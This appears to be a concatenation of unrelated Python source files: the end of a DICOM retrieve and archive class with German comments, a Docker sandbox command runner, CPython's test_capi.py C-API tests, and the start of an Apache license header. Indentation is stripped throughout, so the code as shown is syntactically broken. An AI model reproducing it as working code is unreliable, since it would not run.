logger.debug( 'dicomClass._retrieve: {} - C-MOVE query status: {}'.format( i, hex(result) ) )
# If the status is 'Pending' then the identifier is the C-MOVE response
# Pending
# | ``0xFF00`` - Sub-operations are continuing
# Der weitere Ablauf wird über retrieve_thread abgewickelt
if status.Status in (0xFF00, 0xFF01):
if identifier:
print( "dicomClass._retrieve: 0xFF00, 0xFF01", identifier )
pass
elif status.Status == 0x0000:
if identifier:
print( "dicomClass._retrieve: 0x0000", identifier)
pass
elif status.Status == 0xc002:
# User’s callback implementation returned an invalid status object (not a pydicom Dataset or an int)
if identifier:
print( "dicomClass._retrieve: 0xc002", identifier)
elif status.Status in (0xC511, 0xC512):
logger.error( "dicomClass._retrieve: Fehler beim speichern der DICOM Daten" )
if identifier:
print( "dicomClass._retrieve 0xC511", identifier)
# 0xB000 -Warning - Sub-operations complete, one or more or warnings
else:
# Association._wrap_get_move_responses
# print("Connection timed out", responses )
logger.warning('dicomClass._retrieve - Connection timed out, was aborted or received invalid response')
else:
pass
logger.debug("dicomClass._retrieve: DICOM Daten holen: {} - {}".format( hex(result), SOPInstanceUID ) )
# wenn nicht pending (retrieve_thread übernimmt) EVT_C_STORE mit _is_cancelled senden
# 0xff00 - Pending
# 0x0000 - Success
if not result in ( 0x0000, 0xff00):
signal( 'dicom.EVT_C_STORE').send( {
"name": "EVT_C_STORE",
"_is_cancelled": True,
"status": result,
"hex": hex(result),
"msg": "run EVT_C_STORE"
} )
return result
def archive_hasSOPInstanceUID(self, SOPInstanceUID):
"""Prüft ob eine SOPInstanceUID schon im File Archiv vorhanden ist
Parameters
----------
SOPInstanceUID : TYPE
Eine SOPInstanceUID.
Returns
-------
exists : bool
Datei vorhanden oder nicht.
filename : str
Der geprüfte Dateiname
"""
filename = osp.join( self.dicomPath, self.subPath, SOPInstanceUID + ".dcm" )
return os.path.isfile( filename ), filename
def archive_loadSOPInstanceUID( self, SOPInstanceUID ):
"""Lädt eine Dicomdatei mit SOPInstanceUID aus dem Archiv
Parameters
----------
SOPInstanceUID : str
Eine SOPInstanceUID.
Returns
-------
ds : TYPE
DESCRIPTION.
"""
ds = None
exists, filename = self.archive_hasSOPInstanceUID( SOPInstanceUID )
if exists:
try:
# mit force True einlesen um trotz fehlender headerdaten einzulesen
ds = dcmread(filename, force=True)
except: # pragma: no cover
# alle sonstigen Fehler abfangen
logger.error("Fehler beim lesen der DICOM Datei")
pass
return ds
def archive_deleteSOPInstanceUID(self, SOPInstanceUID):
"""Löscht ein Dataset aus dem File Archiv.
Parameters
----------
SOPInstanceUID : TYPE
Eine SOPInstanceUID.
Returns
-------
filename : str
Der entfernte Dateiname
"""
exists, filename = self.archive_hasSOPInstanceUID( SOPInstanceUID )
if exists:
os.remove( filename )
return filename
def retrieve( self, params={} ):
"""Holt DICOM Daten mit threading und event Benachrichtigung.
Ruft _retrieve mit den Parametern auf
suchen nach
Received unexpected C-MOVE service message in pynetdicom Association _serve_request
aufgerufen von _run_reactor
Parameters
----------
params : dict, optional
DESCRIPTION. The default is {}.
Returns
-------
instances : list
gefundene Dataset Instances.
signals: list
"""
instances = []
signals = []
result_available = threading.Event()
mq = queue.Queue()
def _C_STORE( signal ):
signals.append(signal)
if signal["_is_cancelled"] == True:
# Vorgang abbrechen
result_available.set()
elif signal["_is_cancelled"] == False:
if "dataset" in signal:
# Ergebnis setzen und abbrechen
instances.append( signal["dataset"] )
result_available.set()
def _RELEASED( signal ):
signals.append( signal )
result_available.set()
def _REJECTED( signal ):
signals.append( signal )
result_available.set()
def _ABORTED( signal ):
signals.append( signal )
result_available.set()
signal( 'dicom.EVT_C_STORE' ).connect( _C_STORE )
signal( 'dicom.EVT_REJECTED' ).connect( _REJECTED )
signal( 'dicom.EVT_RELEASED' ).connect( _RELEASED )
signal( 'dicom.EVT_ABORTED' ).connect( _ABORTED )
# Als Thread aufrufen, über mq.get() wird die Rückgabe von _retrieve abgerufen
thread = threading.Thread( target=lambda q, args: q.put( self._retrieve( **args ) ), args=( mq, params ) )
thread.start()
# nach max. 10 sec den Vorgang abbrechen
while not result_available.wait( timeout=10 ):
result_available.set()
return instances, signals
|
docker.py
|
# -*- encoding: utf-8 -*-
from __future__ import nested_scopes, generators, division, absolute_import, \
with_statement, print_function, unicode_literals
import logging
from subprocess import Popen, PIPE
from strings import get_random_string
import io
import threading
import subprocess
log = logging.getLogger(__name__)
BUF_SIZE = 4096
LIMIT_BYTES = 10 * 1024 * 1024
def kill_and_remove(ctr_name):
for action in ('kill', 'rm'):
p = Popen('docker %s %s' % (action, ctr_name), shell=True,
stdout=PIPE, stderr=PIPE)
if p.wait() != 0:
log.warning(p.stderr.read())
# raise RuntimeError()
def limited_reader(fn_in, fn_out, limit_bytes):
fn = io.open(fn_in.fileno(), encoding="utf-8")
read_bytes = 0
truncated = False
try:
while True:
buf = fn.read(BUF_SIZE)
if len(buf) == 0:
break
if read_bytes >= limit_bytes and not truncated:
fn_out.write("\nTRUNCATED\n")
truncated = True
read_bytes += len(buf)
if not truncated:
fn_out.write(buf)
except Exception as e:
fn_out.write("Error while read or write proccess output: {}".format(e))
def execute(cmd, user="nobody", cwd=None, timeout=None, network='none',
memory_limit=str('1024m'),
image='ubuntu:14.04', volumes=None, name_prefix=''):
if not isinstance(cmd, list):
raise TypeError('cmd argument is not a list')
if volumes is not None and not isinstance(volumes, list):
raise TypeError('volumes argument is not a list')
if timeout is not None and not isinstance(timeout, (float, int)):
raise TypeError('timeout argument is not a float')
if memory_limit is not None:
if not isinstance(memory_limit, str):
raise TypeError('memory_limit argument is not a str')
if not memory_limit or memory_limit[-1] not in 'bkmg':
raise ValueError('memory_limit argument invalid (use '
'<number><unit> format, where unit can be one of '
'b, k, m, or g)')
if cwd is None:
cwd = '/'
name = get_random_string()
command = []
if timeout:
# timeout docker run
command += ['timeout', '-k', str(timeout + 3), str(timeout + 2)]
command += ['docker', 'run', '--rm', '--name', name_prefix + name]
if network != 'bridge':
command += ['--net', network]
if user != 'root':
command += ['-u', user]
if cwd != '/':
command += ['-w', cwd]
if volumes:
for v in volumes:
command += ['-v', v]
if memory_limit:
command += ['-m', memory_limit]
command += [image]
if timeout:
# timeout in docker run
command += ['timeout', '-k', str(timeout + 1), str(timeout)]
logging.info("Will run: %s", command + cmd)
p = subprocess.Popen(command + cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = io.StringIO()
t1 = threading.Thread(target=limited_reader, args=(p.stdout, output, LIMIT_BYTES))
t2 = threading.Thread(target=limited_reader, args=(p.stderr, output, LIMIT_BYTES))
t1.start()
t2.start()
t1.join()
t2.join()
p.wait()
status = p.returncode
output = output.getvalue()
is_timeout = status == -9 or status == 124
if status == -9: # Happens on timeout
# We have to kill the container since it still runs
# detached from Popen and we need to remove it after because
# --rm is not working on killed containers
kill_and_remove(name)
return status == 0 and not is_timeout, status, is_timeout, output
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned NULL '
br'without setting an error\n'
br'Python runtime state: initialized\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned a '
br'result with an error set\n'
br'Python runtime state: initialized\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need in the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_heaptype_with_setattro(self):
obj = _testcapi.HeapCTypeSetattr()
self.assertEqual(obj.pvalue, 10)
obj.value = 12
self.assertEqual(obj.pvalue, 12)
del obj.value
self.assertEqual(obj.pvalue, 0)
def test_pynumber_tobase(self):
from _testcapi import pynumber_tobase
self.assertEqual(pynumber_tobase(123, 2), '0b1111011')
self.assertEqual(pynumber_tobase(123, 8), '0o173')
self.assertEqual(pynumber_tobase(123, 10), '123')
self.assertEqual(pynumber_tobase(123, 16), '0x7b')
self.assertEqual(pynumber_tobase(-123, 2), '-0b1111011')
self.assertEqual(pynumber_tobase(-123, 8), '-0o173')
self.assertEqual(pynumber_tobase(-123, 10), '-123')
self.assertEqual(pynumber_tobase(-123, 16), '-0x7b')
self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
self.assertRaises(TypeError, pynumber_tobase, '123', 10)
self.assertRaises(SystemError, pynumber_tobase, 123, 0)
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
def test_subinterps_recent_language_features(self):
r, w = os.pipe()
code = """if 1:
import pickle
with open({:d}, "wb") as f:
def noop(x): return x
a = (b := f'1{{2}}3') + noop('x') # Py 3.8 (:=) / 3.6 (f'')
async def foo(arg): return await arg # Py 3.5
pickle.dump(dict(a=a, b=b), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: Python memory allocator called '
'without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok('-c', code, PYTHONMALLOC=self.PYTHONMALLOC)
def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
